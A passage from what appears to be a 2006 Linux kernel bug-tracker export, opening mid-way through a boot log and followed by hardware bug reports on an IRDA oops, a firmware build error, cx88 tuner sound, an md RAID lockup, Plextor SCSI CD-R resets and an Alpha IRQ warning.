Interrupt Link [LIDE] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. [ 26.990104] ACPI: PCI Interrupt Link [LSID] (IRQs 3 4 5 7 9 10 *11 12 14 15) [ 26.990382] ACPI: PCI Interrupt Link [LFID] (IRQs 3 4 5 7 9 *10 11 12 14 15) [ 26.990658] ACPI: PCI Interrupt Link [LPCA] (IRQs 3 4 5 7 9 10 11 12 14 15) *0, disabled. [ 26.990964] ACPI: PCI Interrupt Link [APC1] (IRQs 16) *0, disabled. [ 26.991264] ACPI: PCI Interrupt Link [APC2] (IRQs 17) *0, disabled. [ 26.991560] ACPI: PCI Interrupt Link [APC3] (IRQs 18) *0, disabled. [ 26.991856] ACPI: PCI Interrupt Link [APC4] (IRQs 19) *0, disabled. [ 26.992089] ACPI: PCI Interrupt Link [APC5] (IRQs *16), disabled. [ 26.992402] ACPI: PCI Interrupt Link [APCF] (IRQs 20 21 22 23) *0, disabled. [ 26.992713] ACPI: PCI Interrupt Link [APCG] (IRQs 20 21 22 23) *0, disabled. [ 26.993023] ACPI: PCI Interrupt Link [APCH] (IRQs 20 21 22 23) *0, disabled. [ 26.993334] ACPI: PCI Interrupt Link [APCJ] (IRQs 20 21 22 23) *0, disabled. [ 26.993641] ACPI: PCI Interrupt Link [APCK] (IRQs 20 21 22 23) *0, disabled. [ 26.993947] ACPI: PCI Interrupt Link [APCS] (IRQs 20 21 22 23) *0, disabled. [ 26.994257] ACPI: PCI Interrupt Link [APCL] (IRQs 20 21 22 23) *0, disabled. [ 26.994569] ACPI: PCI Interrupt Link [APCZ] (IRQs 20 21 22 23) *0, disabled. [ 26.994883] ACPI: PCI Interrupt Link [APSI] (IRQs 20 21 22 23) *0, disabled. [ 26.995201] ACPI: PCI Interrupt Link [APSJ] (IRQs 20 21 22 23) *0, disabled. [ 26.995514] ACPI: PCI Interrupt Link [APCP] (IRQs 20 21 22 23) *0, disabled. [ 26.996926] SCSI subsystem initialized [ 26.996964] PCI: Using ACPI for IRQ routing [ 26.996967] PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report [ 26.996998] PCI: Cannot allocate resource region 1 of device 0000:01:0a.0 [ 26.997568] PCI: Bus 2, cardbus bridge: 0000:01:07.0 [ 26.997570] IO window: 0000ac00-0000acff [ 26.997572] IO window: 00002000-000020ff [ 26.997575] PREFETCH window: d8000000-d9ffffff [ 26.997578] MEM window: da000000-dbffffff [ 26.997581] PCI: Bridge: 0000:00:09.0 [ 26.997582] IO window: a000-afff [ 26.997585] MEM window: d8000000-dfffffff [ 26.997587] PREFETCH window: fdf00000-fdffffff [ 26.997589] PCI: Bridge: 0000:00:0b.0 [ 26.997591] IO window: 9000-9fff [ 26.997593] MEM window: fde00000-fdefffff [ 26.997595] PREFETCH window: fdd00000-fddfffff [ 26.997597] PCI: Bridge: 0000:00:0c.0 [ 26.997599] IO window: 8000-8fff [ 26.997601] MEM window: fdc00000-fdcfffff [ 26.997603] PREFETCH window: fdb00000-fdbfffff [ 26.997605] PCI: Bridge: 0000:00:0d.0 [ 26.997607] IO window: 7000-7fff [ 26.997609] MEM window: fda00000-fdafffff [ 26.997611] PREFETCH window: fd900000-fd9fffff [ 26.997613] PCI: Bridge: 0000:00:0e.0 [ 26.997615] IO window: 6000-6fff [ 26.997617] MEM window: fa000000-fcffffff [ 26.997619] PREFETCH window: c0000000-cfffffff [ 26.997625] PCI: Setting latency timer of device 0000:00:09.0 to 64 [ 26.997827] ACPI: PCI Interrupt Link [APC4] enabled at IRQ 19 [ 26.997831] GSI 16 sharing vector 0xB1 and IRQ 16 [ 26.997836] ACPI: PCI Interrupt 0000:01:07.0[A] -&gt; Link [APC4] -&gt; GSI 19 (level, low) -&gt; IRQ 177 [ 26.997843] PCI: Setting latency timer of device 0000:00:0b.0 to 64 [ 26.997847] PCI: Setting latency timer of device 0000:00:0c.0 to 64 [ 26.997851] PCI: Setting latency timer of device 0000:00:0d.0 to 64 [ 26.997855] PCI: Setting latency timer of device 0000:00:0e.0 to 64 [ 26.997875] NET: Registered protocol family 2 [ 27.008113] IP route cache hash table entries: 65536 (order: 7, 524288 bytes) [ 27.008353] TCP established hash table entries: 262144 (order: 10, 4194304 bytes) [ 27.010421] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes) [ 27.010925] TCP: Hash tables configured (established 262144 bind 65536) [ 27.010928] TCP reno registered [ 27.011207] IA32 emulation $Id: sys_ia32.c,v 1.32 2002/03/24 13:02:28 ak Exp $ [ 27.011757] SGI XFS with large block/inode numbers, no debug enabled [ 27.011867] io scheduler noop registered [ 27.011873] io scheduler anticipatory registered (default) [ 32.517418] 0000:00:02.1 EHCI: BIOS handoff failed (BIOS bug ?) 01010001 [ 32.517690] PCI: Setting latency timer of device 0000:00:0b.0 to 64 [ 32.517694] pcie_portdrv_probe-&gt;Dev[005d:10de] has invalid IRQ. Check vendor BIOS [ 32.517708] assign_interrupt_mode Found MSI capability [ 32.517734] Allocate Port Service[0000:00:0b.0:pcie00] [ 32.517765] Allocate Port Service[0000:00:0b.0:pcie03] [ 32.517791] PCI: Setting latency timer of device 0000:00:0c.0 to 64 [ 32.517793] pcie_portdrv_probe-&gt;Dev[005d:10de] has invalid IRQ. Check vendor BIOS [ 32.517805] assign_interrupt_mode Found MSI capability [ 32.517820] Allocate Port Service[0000:00:0c.0:pcie00] [ 32.517842] Allocate Port Service[0000:00:0c.0:pcie03] [ 32.517870] PCI: Setting latency timer of device 0000:00:0d.0 to 64 [ 32.517873] pcie_portdrv_probe-&gt;Dev[005d:10de] has invalid IRQ. Check vendor BIOS [ 32.517884] assign_interrupt_mode Found MSI capability [ 32.517899] Allocate Port Service[0000:00:0d.0:pcie00] [ 32.517922] Allocate Port Service[0000:00:0d.0:pcie03] [ 32.517949] PCI: Setting latency timer of device 0000:00:0e.0 to 64 [ 32.517951] pcie_portdrv_probe-&gt;Dev[005d:10de] has invalid IRQ. Check vendor BIOS [ 32.517963] assign_interrupt_mode Found MSI capability [ 32.517976] Allocate Port Service[0000:00:0e.0:pcie00] [ 32.518001] Allocate Port Service[0000:00:0e.0:pcie03] [ 32.518083] vesafb: framebuffer at 0xc0000000, mapped to 0xffffc20010100000, using 5120k, total 262144k [ 32.518086] vesafb: mode is 1280x1024x16, linelength=2560, pages=1 [ 32.518088] vesafb: scrolling: redraw [ 32.518090] vesafb: Truecolor: size=0:5:6:5, shift=0:11:5:0 [ 32.531758] Console: switching to colour frame buffer device 160x64 [ 32.531762] fb0: VESA VGA frame buffer device [ 32.531780] ACPI: Power Button (FF) [PWRF] [ 32.531788] ACPI: Power Button (CM) [PWRB] [ 32.531805] ACPI: Fan [FAN] (on) [ 32.535580] ACPI: Thermal Zone [THRM] (40 C) [ 32.536873] Real Time Clock Driver v1.12ac [ 32.537092] loop: loaded (max 8 devices) [ 32.537159] Linux video capture interface: v1.00 [ 32.537164] Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 [ 32.537167] ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx [ 32.537191] NFORCE-CK804: IDE controller at PCI slot 0000:00:06.0 [ 32.537202] NFORCE-CK804: chipset revision 162 [ 32.537204] NFORCE-CK804: not 100% native mode: will probe irqs later [ 32.537208] NFORCE-CK804: 0000:00:06.0 (rev a2) UDMA133 controller [ 32.537213] ide0: BM-DMA at 0xe800-0xe807, BIOS settings: hda:DMA, hdb:DMA [ 32.537220] ide1: BM-DMA at 0xe808-0xe80f, BIOS settings: hdc:DMA, hdd:DMA [ 32.537226] Probing IDE interface ide0... [ 33.055765] Probing IDE interface ide1... [ 33.727027] hdc: _NEC DVD_RW ND-3550A, ATAPI CD/DVD-ROM drive [ 34.339619] isa bounce pool size: 16 pages [ 34.339625] ide1 at 0x170-0x177,0x376 on irq 15 [ 34.340397] hdc: ATAPI 48X DVD-ROM DVD-R CD-R/RW drive, 2048kB Cache, UDMA(33) [ 34.340402] Uniform CD-ROM driver Revision: 3.20 [ 34.342549] libata version 1.20 loaded. [ 34.342570] sata_nv 0000:00:07.0: version 0.8 [ 34.342975] ACPI: PCI Interrupt Link [APSI] enabled at IRQ 23 [ 34.342979] GSI 17 sharing vector 0xE1 and IRQ 17 [ 34.342984] ACPI: PCI Interrupt 0000:00:07.0[A] -&gt; Link [APSI] -&gt; GSI 23 (level, low) -&gt; IRQ 225 [ 34.343129] PCI: Setting latency timer of device 0000:00:07.0 to 64 [ 34.343187] ata1: SATA max UDMA/133 cmd 0x9F0 ctl 0xBF2 bmdma 0xD400 irq 225 [ 34.343203] ata2: SATA max UDMA/133 cmd 0x970 ctl 0xB72 bmdma 0xD408 irq 225 [ 34.543964] ata1: SATA link up 3.0 Gbps (SStatus 123) [ 34.697875] ata1: dev 0 cfg 49:2f00 82:746b 83:7f01 84:4023 85:7469 86:3c01 87:4023 88:407f [ 34.697878] ata1: dev 0 ATA-7, max UDMA/133, 488397168 sectors: LBA48 [ 34.697968] nv_sata: Primary device added [ 34.697969] nv_sata: Primary device removed [ 34.697971] nv_sata: Secondary device added [ 34.697972] nv_sata: Secondary device removed [ 34.700868] ata1: dev 0 configured for UDMA/133 [ 34.700870] scsi0 : sata_nv [ 34.901531] ata2: SATA link up 3.0 Gbps (SStatus 123) [ 35.055439] ata2: dev 0 cfg 49:2f00 82:746b 83:7f01 84:4023 85:7469 86:3c01 87:4023 88:407f [ 35.055442] ata2: dev 0 ATA-7, max UDMA/133, 488397168 sectors: LBA48 [ 35.055530] nv_sata: Primary device added [ 35.055532] nv_sata: Primary device removed [ 35.055533] nv_sata: Secondary device added [ 35.055534] nv_sata: Secondary device removed [ 35.058434] ata2: dev 0 configured for UDMA/133 [ 35.058436] scsi1 : sata_nv [ 35.058511] Vendor: ATA Model: WDC WD2500KS-00M Rev: 02.0 [ 35.058519] Type: Direct-Access ANSI SCSI revision: 05 [ 35.058598] Vendor: ATA Model: WDC WD2500KS-00M Rev: 02.0 [ 35.058605] Type: Direct-Access ANSI SCSI revision: 05 [ 35.059059] ACPI: PCI Interrupt Link [APSJ] enabled at IRQ 22 [ 35.059062] GSI 18 sharing vector 0xE9 and IRQ 18 [ 35.059066] ACPI: PCI Interrupt 0000:00:08.0[A] -&gt; Link [APSJ] -&gt; GSI 22 (level, low) -&gt; IRQ 233 [ 35.059174] PCI: Setting latency timer of device 0000:00:08.0 to 64 [ 35.059218] ata3: SATA max UDMA/133 cmd 0x9E0 ctl 0xBE2 bmdma 0xC000 irq 233 [ 35.059235] ata4: SATA max UDMA/133 cmd 0x960 ctl 0xB62 bmdma 0xC008 irq 233 [ 35.259099] ata3: SATA link up 1.5 Gbps (SStatus 113) [ 35.413009] ata3: dev 0 cfg 49:2f00 82:7c6b 83:7f09 84:4063 85:7c69 86:3e01 87:4063 88:407f [ 35.413013] ata3: dev 0 ATA-7, max UDMA/133, 398297088 sectors: LBA48 [ 35.413958] nv_sata: Primary device added [ 35.413959] nv_sata: Primary device removed [ 35.413960] nv_sata: Secondary device added [ 35.413962] nv_sata: Secondary device removed [ 35.417002] ata3: dev 0 configured for UDMA/133 [ 35.417004] scsi2 : sata_nv [ 35.617665] ata4: SATA link up 1.5 Gbps (SStatus 113) [ 35.771573] ata4: dev 0 cfg 49:2f00 82:7c6b 83:7f09 84:4063 85:7c69 86:3e01 87:4063 88:407f [ 35.771576] ata4: dev 0 ATA-7, max UDMA/133, 398297088 sectors: LBA48 [ 35.772504] nv_sata: Primary device added [ 35.772506] nv_sata: P</t>
  </si>
  <si>
    <t>Kernel Oops, IRDA stack related</t>
  </si>
  <si>
    <t>v2.6.16.16 + squashfs v3.0 patch</t>
  </si>
  <si>
    <t>2006-05-18 10:08 UTC</t>
  </si>
  <si>
    <t>2006-12-19 15:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: v2.6.16.16 - haven't tried earlier versions. Just now started using IRDA for phone management. Distribution: Debian Unstable/Uptodate. Kernel is vanilla v2.6.16.16 + squashfs 3.0 patch applied. Otherwise clean tree. Hardware Environment: Evo N800v, Software Environment: Linux huh 2.6.16.16-evo #1 Fri May 12 12:17:14 EEST 2006 i686 GNU/Linux Gnu C 4.0.4 Gnu make 3.81 binutils 2.16.91 util-linux 2.12r mount 2.12r module-init-tools 3.2.2 e2fsprogs 1.39-WIP reiserfsprogs 3.6.19 xfsprogs 2.7.16 pcmcia-cs 3.2.8 nfs-utils 1.0.7 Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Procps 3.2.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.94 udev 092 Modules Loaded option radeon drm nfsd lockd sunrpc ipv6 deflate zlib_deflate zlib_inflate twofish serpent aes blowfish des sha256 sha1 md5 crypto_null dm_mod irnet ppp_generic slhc irlan ircomm_tty ircomm pl2303 usbserial pcmcia firmware_class snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss irtty_sir sir_dev pcspkr snd_pcm snd_timer irda 8250_pnp ohci_hcd ide_cd crc_ccitt floppy ehci_hcd 8250 serial_core yenta_socket cdrom snd rsrc_nonstatic soundcore pcmcia_core snd_page_alloc intel_agp agpgart Problem Description: Recently I've started using IRDA, to manage phone/calendar &amp; co on Nokia 6310 phone. For this task I am using IRDA and xgnokii management software. Sometimes for no reason I am getting oopses at random addresses. System is not locking up or so. It always prints oops followed by messages : May 14 00:40:52 huh kernel: &lt;1&gt;Fixing recursive fault but reboot is needed! After reboot it takes again some time - ooops is reported at different location (mostly random, but backtrace is same). Steps to reproduce: It is quite simple, attempt to download phonebook, calendar, then attempt to upload. Sometimes it happens during logo download/upload. Oops will be added in the next comments.</t>
  </si>
  <si>
    <t>nuild error: sound/pci/rme9652/hdsp.c:4802 undefined reference to `request_firmware'</t>
  </si>
  <si>
    <t>linux-2.6.17-rc4-git6</t>
  </si>
  <si>
    <t>2006-05-19 05:01 UTC</t>
  </si>
  <si>
    <t>2006-07-02 04:35 UTC</t>
  </si>
  <si>
    <t>Playing with differnt kernel config I got: n22 ~/kernel_qa_test # tail make.log.8 CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 sound/built-in.o: In function `hdsp_request_fw_loader': sound/pci/rme9652/hdsp.c:4802: undefined reference to `request_firmware' sound/pci/rme9652/hdsp.c:4815: undefined reference to `release_firmware' sound/pci/rme9652/hdsp.c:4809: undefined reference to `release_firmware' make: *** [.tmp_vmlinux1] Error 1</t>
  </si>
  <si>
    <t>No sound in cx88 with Winfast PVR 2000 tuner card</t>
  </si>
  <si>
    <t>2.6.14-&gt;2.6.16.6</t>
  </si>
  <si>
    <t>2006-05-20 13:19 UTC</t>
  </si>
  <si>
    <t>Farkas L</t>
  </si>
  <si>
    <t>2007-01-17 05:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution:2.6.13.5 Hardware Environment:AMD64 3000+ Mainboard: Nforce4 from Foxconn (ck804k8ma), Video card: Nvidia GeForce 6600 GT, Winfast PVR 2000 tuner card Software Environment: Problem Description:No Sound with cx88 module In kernel 2.6.12.6 it worked well, from 2.6.13 the sound works, but if i close any of the application (xawtv kdetv tvtime) the sound doesn't stop. From the module starts well but 2.4.14 there is no sound. Steps to reproduce:</t>
  </si>
  <si>
    <t>md + bad disk + "mdadd --add" = crach</t>
  </si>
  <si>
    <t>2006-05-21 02:23 UTC</t>
  </si>
  <si>
    <t>2007-08-08 20:44 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian stable + selfcompiled kernel (vanilla 2.6.16) (config as attachment) Hardware Environment: motherboard Intel D945something, 2GB RAM, 3x SATA disk e1000 not used - not working reliably computer tested with memtest86, burnP6, all OK server:~# lspci 0000:00:00.0 Host bridge: Intel Corp.: Unknown device 2770 (rev 02) 0000:00:02.0 VGA compatible controller: Intel Corp.: Unknown device 2772 (rev 02) 0000:00:1c.0 PCI bridge: Intel Corp.: Unknown device 27d0 (rev 01) 0000:00:1c.2 PCI bridge: Intel Corp.: Unknown device 27d4 (rev 01) 0000:00:1c.3 PCI bridge: Intel Corp.: Unknown device 27d6 (rev 01) 0000:00:1c.4 PCI bridge: Intel Corp.: Unknown device 27e0 (rev 01) 0000:00:1c.5 PCI bridge: Intel Corp.: Unknown device 27e2 (rev 01) 0000:00:1d.0 USB Controller: Intel Corp.: Unknown device 27c8 (rev 01) 0000:00:1d.1 USB Controller: Intel Corp.: Unknown device 27c9 (rev 01) 0000:00:1d.2 USB Controller: Intel Corp.: Unknown device 27ca (rev 01) 0000:00:1d.3 USB Controller: Intel Corp.: Unknown device 27cb (rev 01) 0000:00:1d.7 USB Controller: Intel Corp.: Unknown device 27cc (rev 01) 0000:00:1e.0 PCI bridge: Intel Corp. 82801 PCI Bridge (rev e1) 0000:00:1f.0 ISA bridge: Intel Corp.: Unknown device 27b8 (rev 01) 0000:00:1f.1 IDE interface: Intel Corp.: Unknown device 27df (rev 01) 0000:00:1f.2 0106: Intel Corp.: Unknown device 27c1 (rev 01) 0000:00:1f.3 SMBus: Intel Corp.: Unknown device 27da (rev 01) 0000:01:00.0 Ethernet controller: Intel Corp.: Unknown device 108c (rev 03) 0000:01:00.2 IDE interface: Intel Corp.: Unknown device 108d (rev 03) 0000:01:00.3 Serial controller: Intel Corp.: Unknown device 108f (rev 03) 0000:01:00.4 0c07: Intel Corp.: Unknown device 108e (rev 03) 0000:06:01.0 Ethernet controller: 3Com Corporation 3c905 100BaseTX [Boomerang] Software Environment: Debian stable, samba, cups, dhcp server Problem Description: 1) strange crash with filesystem corruption server (samba) is not accessible, onsite person rebooted server, boot failed with filesystem errors (on ext3 partition), manual fsck is needed, major data loss (sorry, I don't have more info on this one) 2) mdadm --manage .. --add locks computer after recovering data from backup I noticed broken sw raid. I tried mdadm --manage /dev/md1 --add /dev/sdb2 nothing happened (observed by cat /prod/mdstat) so I tried it again At this point any program trying to access disk is locked). I found some error messages on console. sw raid configuration: (correct, at problem time md2 and md3 are brokem - bad sdb) server:~# cat /proc/mdstat Personalities : [raid1] md1 : active raid1 sdb2[0] sda5[1] 1999936 blocks [2/2] [UU] md2 : active raid1 sdb3[0] sda6[1] 3903680 blocks [2/2] [UU] md3 : active raid1 sdb4[0] sda7[1] 283241856 blocks [2/2] [UU] md0 : active raid1 sdb1[0] sda1[1] 3903680 blocks [2/2] [UU] unused devices: &lt;none&gt; Console messages (written to paper): ata2: handling error/timeout ata2: port reset, p_is 0 is 0 pis 0 cmd 44 017 f7 d0 ss 113 se 0 ata2_status = 0x50 Assertion failed! qc-&gt;err_mask == 0 drivers/scsc/ahci.c, ahci_host_intr line 681 Assertion failed! qc-&gt;flags &amp; ATA_QCFLAG_ACTIVE drivers/scsi/libata-core.c, ata_qc_complete, line 3631 ata2: status 0x50 sdb: Current sense key = 0x0 ASC = 0x0 ASCQ = 0x0 Badness in blk_do_ordered at block/ll_rw_blk.c: 550 blk_do_ordered+0x282 elv_next_request+0xd6 scsi_request_fn+0x60 blk_run_queue+0x1f scsi_run_queue+0xfa scsi_next_command+0x26 scsi_end_request+0x94 scsi_io_completion+0x193 sd_rw_intr+0x1b1 scsi_finish_command+0x13 ata_scsi_qc_complete+0x171 ahci_interrupt+0xda handle_IRQ_event+0x20 __do_IRQ+0x53 do_IRQ+0x19 common_interrupt+0x1a cast6_decrypt+16e scsi_request_fn+0x232 blk_run_queue+0x1f scsi_run_queue+0xfa scsi_next_command+0x26 scsi_end_request+0x94 scsi_io_completion+0x193 scsi_blk_pc_done+0x26 ata_scsi_qc_complete+0x6a ata_qc_complete+0x171 ahci_eng_timeout+0x6a scsi_error_handle+0x0 ata_scsi_error+0x12 scsi_error_handle+0x69 kthread-0x80 kthread+0x9a kthread+00 kernel_thread_helper Badness in blk_do_ordered at block/ll_rw_blk.c: 550 blk_do_ordered+0x282 elv_next_request+0xd6 scsi_request_fn+0x60 scsi_error_handler+0x0 blk_run_queue+0x1f scsi_run_queue+0xfa scsi_error_handler+0x0 scsi_run_???_queues+0x12 scsi_error_handler+0x6c2 scsi_error_handler+0 kthread+0x80 scsi_error_handler+0x0 kthread+0x94 kthread kernel_thread_helper Steps to reproduce: 1) can't repoduce 2) mdadm --manage /dev/md1 --add /dev/sdb2, now solved by new disk</t>
  </si>
  <si>
    <t>Plextor CDR PX-W4012 and kernel &gt; 2.6.13</t>
  </si>
  <si>
    <t>2.6.14 and higher version</t>
  </si>
  <si>
    <t>2006-05-21 10:33 UTC</t>
  </si>
  <si>
    <t>Nicolas KIEFFER</t>
  </si>
  <si>
    <t>2007-07-25 12:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: vanilla 2.6.17-rc4 Distribution: Gentoo Hardware Environment: Adaptec SCSI Card 29160, MSI K7-Master Motherboard Software Environment: kernel 2.6.14 and higher Problem Description: When I upgraded the kernel from Vanilla 2.6.13.4 to 2.6.14.x and higher, the plextor CDR PX-W4012 (SCSI ID 3) is encountering errors when inserting and mounting a CD. The scsi channel is then restarted again and again. The weird thing is the Plextor SCSI CD-ROM PX-40TS reader is not impacted by this issue. So it does only impact some specific drives. I do not think it is related to this bug : http://bugzilla.kernel.org/show_bug.cgi?id=5659 Using older kernel (&lt;2.6.14 series) do not show this issue ! I even tried latest gentoo kernel available and the same problem occur, whereas the gentoo 2.6.16r7 almost permit to access to CD between 2 channel reset. --------------DMESG----------------------------------------------------------- ACPI: PCI Interrupt 0000:00:09.0[A] -&gt; GSI 17 (level, low) -&gt; IRQ 17 scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 7.0 &lt;Adaptec 29160 Ultra160 SCSI adapter&gt; aic7892: Ultra160 Wide Channel A, SCSI Id=7, 32/253 SCBs Vendor: QUANTUM Model: ATLAS10K2-TY184L Rev: DDD6 Type: Direct-Access ANSI SCSI revision: 03 scsi0:A:0:0: Tagged Queuing enabled. Depth 32 target0:0:0: Beginning Domain Validation target0:0:0: wide asynchronous target0:0:0: FAST-80 WIDE SCSI 160.0 MB/s DT (12.5 ns, offset 127) target0:0:0: Ending Domain Validation Vendor: MAXTOR Model: ATLAS10K4_36WLS Rev: DFV0 Type: Direct-Access ANSI SCSI revision: 03 scsi0:A:1:0: Tagged Queuing enabled. Depth 32 target0:0:1: Beginning Domain Validation target0:0:1: wide asynchronous target0:0:1: FAST-80 WIDE SCSI 160.0 MB/s DT (12.5 ns, offset 127) target0:0:1: Ending Domain Validation Vendor: MAXTOR Model: ATLAS10K4_36WLS Rev: DFV0 Type: Direct-Access ANSI SCSI revision: 03 scsi0:A:2:0: Tagged Queuing enabled. Depth 32 target0:0:2: Beginning Domain Validation target0:0:2: wide asynchronous target0:0:2: FAST-80 WIDE SCSI 160.0 MB/s DT (12.5 ns, offset 127) target0:0:2: Ending Domain Validation Vendor: PLEXTOR Model: CD-R PX-W4012S Rev: 1.05 Type: CD-ROM ANSI SCSI revision: 02 target0:0:3: Beginning Domain Validation target0:0:3: FAST-20 SCSI 20.0 MB/s ST (50 ns, offset 15) target0:0:3: Domain Validation skipping write tests target0:0:3: Ending Domain Validation Vendor: PLEXTOR Model: CD-ROM PX-40TS Rev: 1.14 Type: CD-ROM ANSI SCSI revision: 02 target0:0:4: Beginning Domain Validation target0:0:4: FAST-20 SCSI 20.0 MB/s ST (50 ns, offset 15) target0:0:4: Domain Validation skipping write tests target0:0:4: Ending Domain Validation SCSI device sda: 35860910 512-byte hdwr sectors (18361 MB) sda: Write Protect is off sda: Mode Sense: f5 00 10 08 SCSI device sda: drive cache: write back w/ FUA SCSI device sda: 35860910 512-byte hdwr sectors (18361 MB) sda: Write Protect is off sda: Mode Sense: f5 00 10 08 SCSI device sda: drive cache: write back w/ FUA sda: sda1 sda2 sda3 sd 0:0:0:0: Attached scsi disk sda SCSI device sdb: 71833096 512-byte hdwr sectors (36779 MB) sdb: Write Protect is off sdb: Mode Sense: ed 00 10 08 SCSI device sdb: drive cache: write back w/ FUA SCSI device sdb: 71833096 512-byte hdwr sectors (36779 MB) sdb: Write Protect is off sdb: Mode Sense: ed 00 10 08 SCSI device sdb: drive cache: write back w/ FUA sdb: sdb1 sdb2 &lt; sdb5 &gt; sd 0:0:1:0: Attached scsi disk sdb SCSI device sdc: 71833096 512-byte hdwr sectors (36779 MB) sdc: Write Protect is off sdc: Mode Sense: ed 00 10 08 SCSI device sdc: drive cache: write back w/ FUA SCSI device sdc: 71833096 512-byte hdwr sectors (36779 MB) sdc: Write Protect is off sdc: Mode Sense: ed 00 10 08 SCSI device sdc: drive cache: write back w/ FUA sdc: sdc1 sdc2 &lt; sdc5 &gt; sd 0:0:2:0: Attached scsi disk sdc sr0: scsi3-mmc drive: 40x/40x writer cd/rw xa/form2 cdda tray sr 0:0:3:0: Attached scsi CD-ROM sr0 sr1: scsi-1 drive sr 0:0:4:0: Attached scsi CD-ROM sr1 sd 0:0:0:0: Attached scsi generic sg0 type 0 sd 0:0:1:0: Attached scsi generic sg1 type 0 sd 0:0:2:0: Attached scsi generic sg2 type 0 sr 0:0:3:0: Attached scsi generic sg3 type 5 sr 0:0:4:0: Attached scsi generic sg4 type 5 --snip-- After inserting a CD in the tray and pmount/hal trying to mount it : -- DMESG new messages with Vanilla kernel 2.6.14 ------------------------------ sr0: Hmm, seems the drive doesn't support multisession CD's target0:0:3: FAST-20 SCSI 20.0 MB/s ST (50 ns, offset 15) (scsi0:A:3:0): No or incomplete CDB sent to device. scsi0: Issued Channel A Bus Reset. 1 SCBs aborted (scsi0:A:3:0): No or incomplete CDB sent to device. (scsi0:A:3:0): Protocol violation in Message-in phase. Attempting to abort. (scsi0:A:3:0): Unexpected busfree in Message-in phase SEQADDR == 0x16c (scsi0:A:3:0): No or incomplete CDB sent to device. scsi0: Issued Channel A Bus Reset. 1 SCBs aborted (scsi0:A:3:0): No or incomplete CDB sent to device. (scsi0:A:3:0): Protocol violation in Message-in phase. Attempting to abort. (scsi0:A:3:0): Unexpected busfree in Message-in phase SEQADDR == 0x16c (scsi0:A:3:0): No or incomplete CDB sent to device. scsi0: Issued Channel A Bus Reset. 1 SCBs aborted sr 0:0:3:0: SCSI error: return code = 0x70000 --DMESG new message with Gentoo kernel 2.6.16r7------------------------------- (scsi0:A:3:0): No or incomplete CDB sent to device. scsi0: Issued Channel A Bus Reset. 1 SCBs aborted sr 0:0:3:0: SCSI error: return code = 0x10002 end_request: I/O error, dev sr0, sector 63128 Buffer I/O error on device sr0, logical block 15782 (scsi0:A:3:0): No or incomplete CDB sent to device. scsi0: Issued Channel A Bus Reset. 1 SCBs aborted VFS: busy inodes on changed media. (scsi0:A:3:0): No or incomplete CDB sent to device. scsi0: Issued Channel A Bus Reset. 1 SCBs aborted Steps to reproduce: insert a CD in the tray, close the door and wait the volume is mounted by pmount (or manually mounted doing the same result)</t>
  </si>
  <si>
    <t>alpha cpu: irq 22: nobody cared (try booting with the "irqpoll" option)</t>
  </si>
  <si>
    <t>2.6.17-rc2</t>
  </si>
  <si>
    <t>2006-05-22 05:14 UTC</t>
  </si>
  <si>
    <t>Thomas Steudten</t>
  </si>
  <si>
    <t>2006-08-25 08:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: self Hardware Environment: alpha board sx164 Software Environment: Problem Description: kernel: irq 22: nobody cared (try booting with the "irqpoll" option) kernel: fffffc001b5eb9f8 0000000000000000 fffffc0000350ea4 fffffc000069c5c0 kernel: fffffc000069c5c0 fffffc000069e610 0000000000000000 0000000000000000 kernel: fffffc0000350608 fffffc000069c5c0 0000000000000016 fffffc000069e610 kernel: fffffc001b5ebb28 fffffc0000736150 fffffc00006a2020 fffffc8900000001 kernel: 0000000def9e738c 1a00000000000000 fffffc0000350594 fffffc000069c5c0 kernel: 0000000000000016 fffffc000069e610 fffffc001b5ebb28 fffffc0000736150 kernel: Trace: kernel: [&lt;fffffc0000350ea4&gt;] note_interrupt+0x114/0x360 kernel: [&lt;fffffc0000350608&gt;] __do_IRQ+0x128/0x140 kernel: [&lt;fffffc0000350594&gt;] __do_IRQ+0xb4/0x140 kernel: [&lt;fffffc0000316120&gt;] handle_irq+0x60/0xd0 kernel: [&lt;fffffc000031f008&gt;] pyxis_device_interrupt+0x118/0x130 kernel: [&lt;fffffc00003164c8&gt;] do_entInt+0x118/0x190 kernel: [&lt;fffffc00003112b0&gt;] ret_from_sys_call+0x0/0x10 kernel: [&lt;fffffc0000350594&gt;] __do_IRQ+0xb4/0x140 kernel: [&lt;fffffc000031f060&gt;] i8259a_mask_and_ack_irq+0x0/0xa0 kernel: [&lt;fffffc0000350418&gt;] handle_IRQ_event+0x48/0x110 kernel: [&lt;fffffc0000350594&gt;] __do_IRQ+0xb4/0x140 kernel: [&lt;fffffc0000316120&gt;] handle_irq+0x60/0xd0 kernel: [&lt;fffffc000031f048&gt;] isa_device_interrupt+0x28/0x40 kernel: [&lt;fffffc000031ef58&gt;] pyxis_device_interrupt+0x68/0x130 kernel: [&lt;fffffc00003164c8&gt;] do_entInt+0x118/0x190 kernel: [&lt;fffffc00003112b0&gt;] ret_from_sys_call+0x0/0x10 kernel: [&lt;fffffc0000457fe0&gt;] udelay+0x0/0x40 kernel: [&lt;fffffc0000457fcc&gt;] __delay+0xc/0x20 kernel: [&lt;fffffc000037d71c&gt;] vfs_write+0x10c/0x200 kernel: [&lt;fffffc000037d958&gt;] sys_write+0x68/0xc0 kernel: [&lt;fffffc0000311294&gt;] entSys+0xa4/0xc0 kernel: kernel: handlers: kernel: [&lt;fffffc00003503c0&gt;] (no_action+0x0/0x10) kernel: Disabling IRQ #22 Steps to reproduce: don't know. this comes randomly. The system must be rebooted to be accessable again. cat /proc/interrupts: 1: 29 XT-PIC i8042 2: 0 XT-PIC cascade 3: 13 XT-PIC serial 